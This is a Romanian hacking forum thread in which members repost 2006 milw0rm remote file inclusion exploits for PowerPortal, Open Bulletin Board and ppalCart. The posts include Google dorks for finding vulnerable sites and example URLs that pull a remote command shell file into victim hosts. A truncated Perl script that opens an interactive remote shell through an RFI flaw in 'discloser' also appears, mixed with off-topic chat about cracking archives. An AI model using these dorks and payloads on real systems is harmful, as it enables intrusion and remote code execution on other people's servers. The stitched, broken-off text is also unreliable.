zRR

OLLYDBG sa traiasca Respect

Done http://eskyjets.com/crackMe.JPG

Parola la arhiva care este :@ :?

Off toata lumea vrea sa puna cate ceva la V.I.P ....... Daca nu vrei sa apara Public tine pentru tine si nu mai zi nimic..... sau vorba lui Shocker .... vorbeai cu cineva care are acces la V.I.P si rezolvai problema .Asha ce faci bagi in boala pe toata lumea ... .. :@

#============================================================================================== # PowerPortal Remote File Include #=============================================================================================== # #Critical Level : Dangerous # # scripts: PowerPortal # download: #Version'>http://www.scripts.com/jump.php?ID=13698 #Version : v1.3a #dork : Powered by PowerPortal v1.3a # note not tested on other version #================================================================================================ #Bug in : #/index.php # #================================================================================================ #Vuln Code : # think #================================================================================================ # #Exploit : # #http://localhost/path_to_PowerPortal/index.php?file_name[]=http://eivlCode.txt? # # #================================================================================================ #Discoverd By : v1per-haCker # #Conatact : v1per-hacker[at]hotmail.com #XP10_hackEr Team #Greetz to : abu_shahad ; RooT-shilL ; hetler_jeddah ; BooB11 ; FaTaL ; ThE-WoLf-KsA ; mohandko ; fooooz ; maVen #thanx to str0ke #and all members in XP10_hackEr Team #WWW.XP10.COM ================================================================================================== # milw0rm.com [2006-09-29]

+-------------------------------------------------------------------- + + Open Bulletin Board 1.0.8 ; Multiple Remote File Include Vulnerabilities + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: Open Bulletin Board 1.0.8 + Venedor ...........: http://www.openbb.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Discovered by ..........: Eddy_BAck0o + Contact ...........: l0x3[at]hotmail.com + +-------------------------------------------------------------------- +-------------------------------------------------------------------- + ./index Directory ... ~ [index.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + require $root_path . "base.php"; <--- 30 - 380 + require $root_path . "base.php"; <--- 46 - 380 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=...com/r0x.txt?cmd + +------------------------------------------------------------------- + ~ [collector.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + root_path = "./"; <--- 24 - 194 + require $root_path . "base.php"; <--- 159 - 194 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + Ex --> http://www.victom.com/index.php?root_path=...com/r0x.txt?cmd + +------------------------------------------------------------------- + Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ] ;.... +-------------------------------------------------------------------- +--------------------------------------------------------------------

Am vazut si eu ........ Sa`u miscat alte nationalitati mai repede ca noiÂÂÂÂ

google dork :"powered by: profitCode" exploite: http:///index.php?proMod=http://shell.txt? discoverde by momo26 !!!!!!!!!!!!!!! +-------------------------------------------------------------------- + + ppalCart V(2.5 EE) Remote File Inclusion + +------------------------------------------------------------------- + + Affected Software .: Software + Version .............: ppalCart 2.5 EE + Venedor ...........: http://www.profitcode.com + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: momo26 + Writtin by ..........: Eddy_BAck0o - www.LEzr.com/vB + Contact ...........: http://www.lezr.com/vb/showthread.php?t=12673 + +-------------------------------------------------------------------- +-------------------------------------------------------------------- + ./index Directory ... + [index.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include $docroot . "js/css/shop-custom.php"; +include $docroot . "js/css/shop-default.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 50 - 349 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +else if($proMod) { +include "$proMod" . ".php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 288 - 349 +Ex --> http://www.victom.com/index.php?proMod=htt...com/r0x.txt?cmd + +------------------------------------------------------------------- +------------------------------------------------------------------- + [mainpage.php] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "shopincs/commonincs/shop-mainbottom" . "$langFile" . ".php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 158 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "tplates/newitems.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 284 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "tplates/specials.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 287 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "cstmincs/cstmbanner$langFile.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 290 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "tplates/upselladvert.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 292 - 308 + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +include "$docroot" . "mainincs/upsellproducts.php"; +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Line --> 298 - 308 +Ex --> http://www.victom.com/mainpage.php?docroot...com/r0x.txt?cmd + +-------------------------------------------------------------------- +Eddy_BAck0o ; +-------------------------------------------------------------------- # milw0rm.com [2006-09-07] SuccesÂÂÂÂ

Pai daca este Remote File ce crezi ca poate sa faca ?

#!/usr/bin/perl ########################################################################################### # Aria-Security.net Advisory # # Discovered by: Dr.t3rr0r1st # # < www.Aria-security.net > # # Gr33t to:outlaw & A.u.r.a & HessamX & Cl0wn & DrtRp # # Special Thanx To All Aria-Security Users # ########################################################################################### use LWP::UserAgent; print "n === discloser 0.0.4 Remote File Inclusionn"; print "n === Discovered by OutLaw .n"; print "n === http://www.Aria-Security.Netn"; $bPath = $ARGV[0]; $cmdo = $ARGV[1]; $bcmd = $ARGV[2]; if($bPath!~/http:/// || $cmdo!~/http:/// || !$bcmd){usage()} while() { print "[shell] $"; while(<STDIN>) { $cmd=$_; chomp($cmd); $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "n Could not connect !n"; $res = $xpl->request($req); $return = $res->content; $return =~ tr/[n]/[

<div class='quotetop'>QUOTE("Criminal")</div> Exact Forumul

Sunt nou ,si chiar imi place Forumul ..... E belea ... Tineti`o asha ca`i bine Respect Tuturor